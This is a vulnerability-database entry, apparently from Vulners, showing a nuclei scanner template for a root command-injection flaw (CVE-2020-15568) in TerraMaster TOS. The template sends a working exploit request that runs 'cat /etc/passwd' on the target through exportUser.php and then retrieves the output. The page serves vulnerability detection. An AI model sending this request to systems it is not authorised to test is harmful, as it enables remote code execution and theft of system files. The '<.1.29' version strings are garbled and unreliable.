Lucene search
K

TerraMaster TOS <.1.29 - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

TerraMaster TOS <.1.29 - Remote Code Execution vulnerability in include/exportUser.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2020-15568
30 Jan 202100:00
attackerkb
Circl
CVE-2020-15568
9 Jun 202106:36
circl
CNNVD
Terramaster TOS 操作系统命令注入漏洞
30 Jan 202100:00
cnnvd
CNVD
TerraMaster TOS Dynamic Class Method Invocation Vulnerability
1 Feb 202100:00
cnvd
Check Point Advisories
TerraMaster TOS Command Injection (CVE-2020-15568)
22 Feb 202100:00
checkpoint_advisories
CVE
CVE-2020-15568
30 Jan 202104:59
cve
Cvelist
CVE-2020-15568
30 Jan 202104:59
cvelist
NVD
CVE-2020-15568
30 Jan 202105:15
nvd
OpenVAS
Terramaster TOS <= 4.1.24 RCE Vulnerability - Active Check
1 Feb 202100:00
openvas
OSV
CVE-2020-15568
30 Jan 202105:15
osv
Rows per page
id: CVE-2020-15568

info:
  name: TerraMaster TOS <.1.29 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.
  reference:
    - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15568
    - https://help.terra-master.com/TOS/view/
    - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568
    - https://github.com/n0bugz/CVE-2020-15568
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15568
    cwe-id: CWE-913
    epss-score: 0.28495
    epss-percentile: 0.97892
    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: tos
    fofa-query: '"terramaster" && header="tos"'
  tags: cve2020,cve,terramaster,rce,terra-master,vkev,vuln
variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /include/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009e962a8ec8fb438a47019be93062259149b285a0a681c5789266bbb10d11ad82022054f3121d10a3061b685f15ff153df3a02fa9f240a33d2a53ad75293867f3f5eb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
CVSS 210
EPSS0.28495
31